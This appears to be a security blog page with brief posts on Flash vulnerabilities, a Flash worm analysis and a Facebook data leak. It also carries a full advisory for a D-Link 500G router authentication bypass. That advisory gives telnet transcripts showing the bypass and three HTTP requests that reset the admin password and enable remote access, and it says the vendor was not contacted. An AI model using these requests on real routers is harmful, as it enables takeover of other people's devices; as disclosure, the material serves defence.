Xanda's Blog !~!

ClientMe v0.01 Alpha – Preview

Aug
25

Don’t get me wrong.. It is not ready yet.. This is just the preview for one of the components

Research shows that 80% of Web users running unpatched versions of Flash/Acrobat

Aug
25

According to a research published by Trusteer earlier this month, 79.5% of the 2.5 million users of their Rapport security service run a vulnerable version of Adobe Flash, with 83.5% also running a vulnerable version of Acrobat.

The company has also criticized Adobe by insisting that their update mechanism “does not meet the requirements of a system that is used by 99% of users on the Internet and is highly targeted by criminals“, but is praising the update mechanism of Google’s Chrome and Firefox, whose silent updates close the window of opportunity for malicious attackers to take advantage of.

[Read more HERE]

Flash Attack Vectors – Cross Site Flashing (XSF)

Aug
25

A few days ago a lot of media wrote about a Flash worm. I managed to get hold of samples and analyzed it (thanks to Peter Kruse of CSIS for the samples).

First of all, while the exploit code contains Flash, it is actually just used as an attack (or, if we stretch it, infection) vector. The worm itself is contained in JavaScript and is very similar to the Twitter worm I analyzed back in April this year (see http://isc.sans.org/diary.html?storyid=6187). That is not surprising as both worms are attacking similar services.

The worm was first identified on a popular Chinese social web site (for schools, if I’m not wrong), Renren (http://www.renren.com). This site is in many ways similar to Twitter or Facebook, but much more media intensive and it allows users to share various information, including pictures, movies etc.

[Read more HERE]

D-LINK 500G Authentication Bypass

Aug
24

SUMMARY
There is an authentication bypass vulnerability in D-Link 500G that allows an attacker to take full control over the device. Remote access is disabled by default, so the attacker is required to be on the local network.
The bypass can be triggered sending a HTTP request without the HOST header.

$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Host: 192.168.0.1
Connection: close
 
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic Realm="DSL-500G"
Content-type: text/html
Content-length: 111
 
<html><head><title>401 Unauthorized Access</title></head><body><h1>401
Unauthorized Access</h1></body></html>
Connection closed by foreign host.
$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Connection: close
 
HTTP/1.1 302 Document Follows
Location: /hag/pages/home.ssi
 
Connection closed by foreign host.

AFFECTED PRODUCTS
Confirmed in D-Link 500G Firmware R2.01.B9.EU(030917a/T93.3.44).
Haven’t tested in other devices and version.

SOLUTION
The manufacturer has not been contacted. Don’t complain on me.

EXPLOIT

Reset the admin password: GET
/Action?cmdSubmit=Submit&ex_param1=admin&id=3&new_pass1=admin&new_pass2=admin&old_pass=admin&user=admin
HTTP/1.0
Enable remote access: GET /Action?cmdSubmit=Submit&remote=0&id=83
HTTP/1.0
Commit changes: GET /Action?cmdCommit=Commit&reboot_loc=0&id=4 HTTP/1.0

CREDITS
Discovered by Jardel Weyrich <jweyrich at gmail dot com>.

Facebook Identity Can be Compromised Just by Reading Forum Posts

Aug
21

I’ve stumbled across a small security vulnerability in Facebook that, after some thought, turned out to be a way to launch a powerful and surprising attack.

The attack allows personal information including full name, profile picture, and friends list to leak to an eagerly awaiting hacker. The uniqueness of this attack, is that the unaware user’s data may be stolen when she is surfing a legitimate, trusted site, not a site controlled by the attacker.

[Read MORE]